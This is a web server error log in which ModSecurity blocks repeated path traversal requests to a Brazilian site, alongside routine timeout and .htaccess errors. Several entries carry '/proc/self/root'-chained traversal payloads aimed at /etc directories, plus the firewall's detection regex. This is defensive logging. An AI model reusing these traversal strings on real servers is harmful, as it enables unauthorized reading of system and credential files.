[Wed Mar 18 16:04:20.300666 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:46894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr3NNa6ubjKNq_cu4bVigAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:04:40.141812 2026] [proxy_fcgi:error] [pid 17887:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:38338] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:04:45.240018 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.241.31:59656] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr3TeyqAr6etmhZHNoBpQAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 16:05:01.912804 2026] [:error] [pid 23798:tid 140411624429312] [client 74.7.244.43:33606] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abr3XT-9rzzdA3Ti0NCItgAAAY4"]
[Wed Mar 18 16:05:04.898765 2026] [:error] [pid 15051:tid 140411683178240] [client 74.7.228.61:59756] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abr3YCmAPhZkrhU8w4miNQAAAIc"]
[Wed Mar 18 16:05:06.164589 2026] [proxy_fcgi:error] [pid 23798:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:39118] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:05:32.129804 2026] [proxy_fcgi:error] [pid 30077:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:39960] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:05:55.117816 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:40678] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:06:17.124101 2026] [proxy_fcgi:error] [pid 17653:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:41384] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:06:40.172511 2026] [proxy_fcgi:error] [pid 29882:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:42172] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:06:47.061270 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.243.128:40068] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr3x-w_le52K8_3pV0UNgAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 16:07:03.125861 2026] [proxy_fcgi:error] [pid 17887:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:42898] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:07:26.122085 2026] [proxy_fcgi:error] [pid 15826:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:43666] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:07:43.291215 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.241.31:48316] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr3_8df6f5d65gmYZQOHgAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:07:49.129825 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:44406] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:08:11.163035 2026] [proxy_fcgi:error] [pid 29882:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:45126] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:08:36.141845 2026] [proxy_fcgi:error] [pid 14269:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:45934] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:09:00.129789 2026] [proxy_fcgi:error] [pid 14269:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:46730] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:09:14.309778 2026] [mime_magic:error] [pid 17653:tid 140411716749056] (70014)End of file found: [client 57.141.18.0:52858] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:09:23.143405 2026] [proxy_fcgi:error] [pid 29882:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:47496] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:09:29.457452 2026] [mime_magic:error] [pid 30077:tid 140411708356352] (70014)End of file found: [client 57.141.18.117:53410] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:09:29.979430 2026] [mime_magic:error] [pid 29882:tid 140411716749056] (70014)End of file found: [client 74.7.243.128:33552] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/sys/devices/system
[Wed Mar 18 16:09:47.129777 2026] [proxy_fcgi:error] [pid 31803:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:48148] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:10:01.503652 2026] [core:alert] [pid 17653:tid 140411582465792] [client 57.141.18.31:54584] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 16:10:04.178355 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.244.43:38960] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abr4jOoXxyEfFpUF8f-u1AAAAVQ"]
[Wed Mar 18 16:10:08.896275 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.228.61:54588] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abr4kOw_le52K8_3pV0UuwAAAgY"]
[Wed Mar 18 16:10:11.149777 2026] [proxy_fcgi:error] [pid 15051:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:49058] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:10:38.137905 2026] [proxy_fcgi:error] [pid 31803:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49924] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:10:57.706485 2026] [mime_magic:error] [pid 11816:tid 140411557287680] (70014)End of file found: [client 74.7.241.31:49668] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/lib
[Wed Mar 18 16:11:05.077782 2026] [proxy_fcgi:error] [pid 23798:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:50846] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:11:32.921779 2026] [proxy_fcgi:error] [pid 26799:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:51766] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:11:56.125794 2026] [proxy_fcgi:error] [pid 17887:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:52682] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:12:03.658333 2026] [mime_magic:error] [pid 17653:tid 140411658000128] (70014)End of file found: [client 57.141.18.40:59190] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:12:13.463151 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.243.128:51046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr5DQkwaGbbGflqUZBL2AAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 16:12:20.721818 2026] [proxy_fcgi:error] [pid 26799:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:53504] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:12:43.132057 2026] [proxy_fcgi:error] [pid 23798:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:54328] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:12:44.567246 2026] [core:alert] [pid 15051:tid 140411708356352] [client 74.7.241.31:58976] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state
[Wed Mar 18 16:13:05.177778 2026] [proxy_fcgi:error] [pid 14269:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:55152] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:13:28.861931 2026] [proxy_fcgi:error] [pid 11816:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:56080] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:13:50.121783 2026] [proxy_fcgi:error] [pid 17887:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:56774] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:14:03.526754 2026] [mime_magic:error] [pid 26799:tid 140411733534464] (70014)End of file found: [client 57.141.18.19:35826] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:14:18.130815 2026] [proxy_fcgi:error] [pid 27403:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:57844] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:14:49.125793 2026] [proxy_fcgi:error] [pid 14269:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:58968] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:15:02.911525 2026] [core:alert] [pid 15826:tid 140411607643904] [client 57.141.18.96:38318] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 16:15:04.377825 2026] [core:alert] [pid 17653:tid 140411574073088] [client 57.141.18.0:38084] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 16:15:13.260488 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.244.43:45158] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abr5weoXxyEfFpUF8f-vbgAAAUM"]
[Wed Mar 18 16:15:18.128593 2026] [proxy_fcgi:error] [pid 26799:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:60088] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:15:19.222397 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.228.61:45934] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abr5x0zinOy1jxa1j4dXOgAAARg"]
[Wed Mar 18 16:15:43.133931 2026] [proxy_fcgi:error] [pid 14269:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:60898] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:16:08.117943 2026] [proxy_fcgi:error] [pid 17887:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:33494] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:16:35.147944 2026] [proxy_fcgi:error] [pid 14269:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:34476] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:16:46.209915 2026] [mime_magic:error] [pid 11816:tid 140411649607424] (70014)End of file found: [client 57.141.18.33:42044] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:16:50.754639 2026] [mime_magic:error] [pid 17887:tid 140411607643904] (70014)End of file found: [client 57.141.18.26:42224] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:17:01.129700 2026] [proxy_fcgi:error] [pid 14269:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:35698] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:17:23.905904 2026] [proxy_fcgi:error] [pid 15051:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:36590] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:17:26.572572 2026] [mime_magic:error] [pid 17653:tid 140411632822016] (70014)End of file found: [client 57.141.18.108:43376] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:17:49.098062 2026] [proxy_fcgi:error] [pid 26799:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:37666] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:18:14.133817 2026] [proxy_fcgi:error] [pid 15051:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:38724] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:18:32.553939 2026] [core:alert] [pid 15826:tid 140411557287680] [client 57.141.18.9:46270] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 16:18:37.131217 2026] [proxy_fcgi:error] [pid 17653:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:39668] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:18:59.129783 2026] [proxy_fcgi:error] [pid 31803:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:40494] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:19:22.141802 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:41510] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:19:23.672507 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.243.128:47086] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr6uymAPhZkrhU8w4mkGwAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 16:19:46.133867 2026] [proxy_fcgi:error] [pid 14269:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42526] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:20:03.348663 2026] [:error] [pid 9953:tid 140411607643904] [client 74.7.241.31:48038] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr64li8u3iYbPixc1xb6AAAA9A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 16:20:04.815287 2026] [:error] [pid 9953:tid 140411725141760] [client 74.7.243.128:39870] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr65Fi8u3iYbPixc1xb6wAAA8I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 16:20:07.024347 2026] [core:alert] [pid 11816:tid 140411733534464] [client 57.141.18.122:50168] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 16:20:07.284338 2026] [:error] [pid 11816:tid 140411733534464] [client 74.7.243.128:41254] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr65-w_le52K8_3pV0WPgAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 16:20:12.125817 2026] [proxy_fcgi:error] [pid 14269:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:43480] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:20:14.695116 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.244.43:44754] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abr67uoXxyEfFpUF8f-wEQAAAVQ"]
[Wed Mar 18 16:20:19.817954 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.228.61:45482] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abr68-oXxyEfFpUF8f-wGAAAAUo"]
[Wed Mar 18 16:20:24.953321 2026] [core:alert] [pid 11816:tid 140411716749056] [client 74.7.241.31:42670] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/lib
[Wed Mar 18 16:20:42.134598 2026] [proxy_fcgi:error] [pid 31803:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:44678] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:20:52.975115 2026] [core:alert] [pid 14269:tid 140411565680384] [client 57.141.18.43:50528] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 16:21:10.148015 2026] [proxy_fcgi:error] [pid 29882:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:45704] AH01075: Error dispatching request to : (polling)
